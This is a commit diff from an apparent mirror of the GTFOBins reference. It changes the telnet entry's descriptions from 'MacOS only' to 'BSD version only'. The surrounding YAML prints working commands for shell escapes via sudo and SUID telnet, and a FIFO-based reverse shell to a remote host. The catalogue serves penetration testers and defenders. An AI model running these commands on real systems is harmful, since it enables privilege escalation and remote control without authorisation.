mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Fix telnet descriptions
This commit is contained in:
parent
158291baa4
commit
ac29dc064d
@ -1,13 +1,13 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
exec-interactive:
|
||||||
- code: |
|
- description: BSD version only.
|
||||||
|
code: |
|
||||||
RHOST=www.google.com
|
RHOST=www.google.com
|
||||||
RPORT=80
|
RPORT=80
|
||||||
telnet $RHOST $RPORT
|
telnet $RHOST $RPORT
|
||||||
^]
|
^]
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
description: MacOS only.
|
|
||||||
reverse-shell:
|
reverse-shell:
|
||||||
- description: Run `nc -l -p 8000` to receive the shell on the other end.
|
- description: Run `nc -l -p 8000` to receive the shell on the other end.
|
||||||
code: |
|
code: |
|
||||||
@ -17,19 +17,20 @@ functions:
|
|||||||
rm $TF
|
rm $TF
|
||||||
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
|
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: |
|
- description: BSD version only.
|
||||||
|
code: |
|
||||||
RHOST=www.google.com
|
RHOST=www.google.com
|
||||||
RPORT=80
|
RPORT=80
|
||||||
sudo telnet $RHOST $RPORT
|
sudo telnet $RHOST $RPORT
|
||||||
^]
|
^]
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
description: MacOS only.
|
|
||||||
suid-limited:
|
suid-limited:
|
||||||
- code: |
|
- description: BSD version only.
|
||||||
|
code: |
|
||||||
RHOST=www.google.com
|
RHOST=www.google.com
|
||||||
RPORT=80
|
RPORT=80
|
||||||
./telnet $RHOST $RPORT
|
./telnet $RHOST $RPORT
|
||||||
^]
|
^]
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
description: MacOS only.
|
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user